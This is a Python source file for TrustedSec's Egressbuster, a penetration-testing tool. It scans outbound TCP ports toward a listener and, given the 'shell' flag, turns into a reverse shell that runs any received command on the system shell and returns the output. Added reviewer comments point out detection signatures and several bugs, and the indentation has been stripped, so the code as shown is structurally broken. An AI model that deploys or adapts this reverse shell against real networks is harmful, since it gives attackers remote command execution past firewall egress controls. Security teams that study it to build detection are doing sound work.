#!/usr/bin/python3
#
# TrustedSec Egressbuster Reverse Shell
#
# Written by Dave Kennedy (ReL1K)
#
# This is the actual egressbuster that connects out from inside a network to the listener and then spawns a shell
#
# Visit: https://www.trustedsec.com - Click on the downloads section for more.
#
import os
import socket
import subprocess
import sys
import _thread
import time
import socket
import random
import string
# How long to wait before making the next request (in seconds)
# Used by the main loop as the pause between launching one worker thread and the next.
sleep = 0.01
# How long to wait before a connection is seen as invalid (in seconds)
# NOTE: start_socket() binds its own local `timeout` (3 or 300) and never reads this
# one; this module-level value is only used as the back-off sleep in the main loop
# once max_threads is reached.
timeout = 3
# How many threads that can be active at once
# Compared against the shared counter num_threads in the main loop.
max_threads = 500
# Display more output
# When False, progress is still printed once every 1000 ports.
verbose = False
# Flipped to True by the first worker that opens a shell session, so that at most
# one command loop is started even if several ports connect successfully.
shell_connected = False
# Number of random alphanumeric characters in the per-session results terminator
# that delimits command output on the wire.
flag_length = 32
# try to import
# argv[1] is the listener address; with no arguments at all, print usage and exit.
try:
ipaddr = sys.argv[1]
except IndexError:
print("""
TrustedSec, LLC
https://www.trustedsec.com
Quick egress buster reverse shell
Written by: Dave Kennedy (ReL1K) (@HackingDave)
A TrustedSec Project
NOTE: Supports all 65536 TCP ports.
Usage: $ egressbuster.py <listener_ip_address> <lowport-highport> (optional_flag_shell)
Note that the last flag is optional. If you want a shell to spawn when a port
is detected, simply type 'shell' as the optional flag.
Example: $ egressbuster.py 10.9.5.2 1-65536 shell
""")
sys.exit()
def start_socket(ipaddr, base_port, shell):
"""Attempt one outbound TCP connection to ipaddr:base_port from a worker thread.

On a successful connect the ASCII port number is sent as the first payload and a
"[*] Connection made" line is printed. If `shell` == "shell" and no session exists
yet, the same connection is kept open (socket timeout 300 s) and serves a command
loop: each received payload is either a "cd " request handled in-process or a
string handed to the system shell, and the combined stdout+stderr followed by the
session terminator is sent back, until the payload "quit" arrives.

Args:
    ipaddr: listener address (sys.argv[1]).
    base_port: TCP port to try.
    shell: "shell" to allow a command session; anything else only probes the port.

Side effects: increments/decrements the module-level num_threads, calls
socket.setdefaulttimeout() (process-wide), may set shell_connected, and may
change the working directory of the whole process.

NOTE(review): this rendering lost all indentation; the nesting of the cd handling
and the placement of the final sockobj.close() below are inferred, not certain.
"""
global num_threads
global shell_connected
# increase thread count
# No lock is taken (none is visible in this file); the main loop polls this
# counter from another thread while workers modify it.
num_threads += 1
if verbose or (base_port % 1000) == 0:
print("[v] Trying: TCP %s" % base_port)
# 3 seconds is too short if commands are going to be entered
# This binds a function-local `timeout`, shadowing the module-level one.
if shell == "shell":
timeout = 300
else:
timeout = 3
# try block to catch exceptions
try:
# Process-wide default: every worker resets it, so the value in effect for a
# socket created by another thread depends on which thread ran last.
socket.setdefaulttimeout(timeout)
sockobj = socket.socket()
sockobj.connect((ipaddr, base_port))
# The first bytes on every successful connection are the port number in ASCII
# (e.g. b"443"); together with the "-----<random>-----" terminator below this
# is the tool's stable on-the-wire signature.
sockobj.send(str(base_port).encode())
print("[*] Connection made to %s on port: %s/tcp\n" % (ipaddr, base_port))
if shell == "shell" and not shell_connected:
# Session terminator: 5 dashes, flag_length random [A-Za-z0-9] characters,
# 5 dashes. Sent once at session start and appended to every command result
# so the listener can tell where one result ends.
results_terminator = '-'*5 + ''.join(random.choice(string.ascii_letters+string.digits) for i in range(flag_length)) + '-'*5
sockobj.send(results_terminator.encode())
shell_connected = True
# start loop
# Runs until "quit" is received; an idle timeout (300 s) or any other error
# propagates to the except clause below.
while 1:
# receive shell command
# A single recv of up to 1024 bytes is treated as one complete command.
data = sockobj.recv(1024).decode()
# if its quit, then break out and close socket
if data == "quit":
break
# do shell command
if data.startswith("cd "):
# str.replace drops every "cd " occurrence in the payload, not only the prefix.
data = data.replace("cd ", "")
cwd = os.getcwd()
# Inferred nesting: a path that exists when appended to cwd is made absolute
# unless it is "/"; the result is then checked again before chdir.
if os.path.isdir(cwd + data):
if data != "/":
data = cwd + data
if os.path.isdir(data):
print(data)
# os.chdir affects the whole process, not just this thread.
os.chdir(data)
stdout_value = b'Changed directory.'
else:
stdout_value = b'Invalid directory. Be sure to use full pathnames to change directories. Not individual directories.'
else:
# Any other payload is passed verbatim to the system shell (shell=True) with no
# allow-list: this is the arbitrary-command-execution path a defender should
# expect to see as shell children of this Python process.
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
# read output
# stdout is drained completely before stderr is read.
stdout_value = proc.stdout.read() + proc.stderr.read()
# send output to attacker
# .decode() uses UTF-8 with strict errors; non-UTF-8 command output raises
# UnicodeDecodeError here and ends the session via the except path.
result_string = stdout_value.decode() + "\n" + results_terminator
sockobj.send(result_string.encode())
# close socket
sockobj.close()
# if we throw an error
# NOTE(review): `timeout` here is the function-local int bound above, not
# socket.timeout. In CPython an except clause whose target is not an exception
# class raises TypeError when an exception reaches it, so the body below is never
# entered; the original error (refused connection, timeout, decode failure) is
# replaced by that TypeError, which the thread machinery prints, and only the
# `finally` clause runs. The connection is therefore not closed explicitly on
# error; it is released when the thread's references go away.
except timeout:
sockobj.close()
if verbose:
print("[v] Can't use port: %s/tcp" % base_port)
# except Exception as e :
# print(e)
# pass through, ports closed
# pass
finally:
# Always runs, so the thread counter is released even when the handler above fails.
num_threads -= 1
return
# Defining default values
# Shared counter polled below; each worker increments it on entry and
# decrements it in its finally clause.
num_threads = 0
shell = ""
portrange = ""
lowport = 1
highport = 1024
# argv[2] = "low-high" port range, argv[3] = optional "shell" flag.
# The bare except swallows every error, so a missing argument silently keeps
# the defaults above (1-1024, no shell session).
try:
portrange = sys.argv[2]
shell = sys.argv[3]
except:
pass
if portrange:
# No validation beyond int(): a malformed range (no "-", non-numeric parts)
# raises IndexError/ValueError here, uncaught.
portrange = portrange.split("-")
lowport = int(portrange[0])
highport = int(portrange[1])
# cycle through ranges
base_port = int(lowport)
end_port = int(highport)
# NOTE(review): valid TCP ports end at 65535; this cap is one too high, so the
# last iteration's connect() is expected to fail inside the worker.
if end_port > 65536:
print("[i] Limiting to TCP 65536...")
end_port = 65536
print("[i] Sending packets to egress listener (%s)..." % ipaddr)
print("[i] Starting at: %s/tcp, ending at: %s/tcp" % (base_port, end_port))
# One worker thread per port, launched `sleep` seconds apart. From the network's
# point of view this is a run of outbound connection attempts from one host to
# one destination across consecutive ports, which is what egress monitoring
# should key on.
while base_port <= end_port:
_thread.start_new_thread(start_socket, (ipaddr, base_port, shell))
time.sleep(sleep)
# Back-pressure: while max_threads workers are live, wait `timeout` (the
# module-level 3 s) and re-check.
while num_threads >= max_threads:
# Lower timeout value, increase max_threads or wait it out...
print("[!] On hold. max_threads limit reached (%s)" % (num_threads))
time.sleep(timeout)
base_port += 1
print("[*] All packets have been sent")
# No join is available for _thread workers; wait by polling the counter until
# every worker's finally clause has run.
while num_threads > 0:
print("[i] Remaining threads: %s" % num_threads)
time.sleep(2)
print("[*] Done")